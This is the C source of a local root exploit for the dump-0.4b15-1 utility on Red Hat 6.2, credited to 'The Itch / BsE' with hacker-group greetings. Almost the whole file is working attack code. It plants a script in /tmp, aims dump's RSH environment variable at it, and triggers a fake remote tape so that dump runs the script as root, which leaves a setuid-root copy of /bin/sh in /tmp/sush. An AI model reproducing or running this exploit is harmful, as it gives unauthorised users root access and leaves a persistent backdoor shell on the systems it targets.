Dump-0.4b15-1 local root exploit tested on Redhat 6.2.
d31cd93409f644756b8b6acfdfd278b35330784f6a3365bc1c5848ed1558216f
/* dump-0.4b15-1 exploit for linux redhat 6.2
dump executes a program named by a user-controlled environment variable
(RSH, used for the remote-tape transport) without dropping root privileges,
which makes spawning a root shell possible.
bug discovered by: mat <mat@hacksware.com>
exploit code by: The Itch / BsE
P.S.: mind the dumb coding, its my first exploit and im still learning
shouts go out to:
Xistence, C-murdah, dystopia, Pyra, Zer0, Wildcoyote, lucipher, Tozz
Shadowlady, Dilusi0n, Calimonk, s0k, Script0r and the rest of Ph33r the B33r
*/
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
#define DUMP "/sbin/dump"
#define TMP "/tmp/rsh"
#define ROOTSHELL "/tmp/sush"
// if you changed #define TMP then change the path of the CHATTRIB too
#define CHATTRIB "chmod 755 /tmp/rsh"
// if you changed the path of dump in #define DUMP then change the
// path of #define RUNDUMP too
#define RUNDUMP "/sbin/dump -0 /"
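/*
 * Entry point.
 *
 * Writes a small shell script to TMP, points dump's RSH environment variable
 * at it and asks dump for a "remote" tape so that dump execs the script while
 * still running with root privileges.  The script copies /bin/sh to ROOTSHELL
 * and makes it root-owned and setuid.
 *
 * Returns EXIT_SUCCESS only when ROOTSHELL exists afterwards as a root-owned
 * setuid file; EXIT_FAILURE on any setup error or when dump did not produce it
 * (e.g. a dump that drops privileges before running $RSH).
 */
int main(void)
{
	int fd;
	FILE *rshfile;
	struct stat st;

	printf("\n* Dump exploit for linux redhat 6.2\n");
	printf("* Bug discovered by Mat <mat@hacksware.com>\n");
	printf("* Exploit coded by The Itch / BsE\n\n");

	/* We need to execute dump, not merely read it: check X_OK rather than
	 * opening it for reading. */
	if (access(DUMP, X_OK) != 0) {
		printf("\n%s not found or is not world readable/executable!!\n\n", DUMP);
		return EXIT_FAILURE;
	}

	/* TMP is a predictable name in a world-writable directory and will be
	 * executed as root by dump.  Remove any stale copy, then create it with
	 * O_EXCL so a symlink or file planted there by another local user is
	 * neither followed nor reused. */
	if (unlink(TMP) != 0 && errno != ENOENT) {
		perror(TMP);
		return EXIT_FAILURE;
	}
	fd = open(TMP, O_WRONLY | O_CREAT | O_EXCL, 0755);
	if (fd < 0) {
		perror(TMP);
		return EXIT_FAILURE;
	}
	rshfile = fdopen(fd, "w");
	if (!rshfile) {
		perror("fdopen");
		close(fd);
		return EXIT_FAILURE;
	}
	fprintf(rshfile, "#!/bin/sh\n");
	fprintf(rshfile, "cp /bin/sh %s\n", ROOTSHELL);
	fprintf(rshfile, "chown root.root %s\n", ROOTSHELL);
	fprintf(rshfile, "chmod 4755 %s\n", ROOTSHELL);
	/* The umask may have stripped execute bits from the mode given to open();
	 * set them explicitly on our own descriptor instead of via system(). */
	if (fchmod(fd, 0755) != 0) {
		perror(TMP);
		fclose(rshfile);
		return EXIT_FAILURE;
	}
	/* fclose() flushes; a failed flush would leave an empty or partial script. */
	if (fclose(rshfile) != 0) {
		perror(TMP);
		return EXIT_FAILURE;
	}

	printf("Invoking vulnerable program %s\n", DUMP);
	printf("Ignore the garbage....\n\n");

	/* A host:device TAPE makes dump reach the "host" by executing $RSH. */
	if (setenv("TAPE", "garbage:garbage", 1) != 0 ||
	    setenv("RSH", TMP, 1) != 0) {
		perror("setenv");
		return EXIT_FAILURE;
	}
	/* dump's own exit status is meaningless here (it fails after running
	 * $RSH), so only a failure to spawn the shell is treated as an error. */
	if (system(RUNDUMP) == -1) {
		perror("system");
		return EXIT_FAILURE;
	}

	/* Verify the outcome instead of assuming it. */
	if (stat(ROOTSHELL, &st) == 0 && st.st_uid == 0 && (st.st_mode & S_ISUID)) {
		printf("\n\nif all went well, a rootshell awaits you in %s\n\n", ROOTSHELL);
		return EXIT_SUCCESS;
	}
	printf("\n\nexploit failed: %s is missing or is not a root-owned setuid file\n\n",
	       ROOTSHELL);
	return EXIT_FAILURE;
}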
/* Remember, there's no cure for BsE */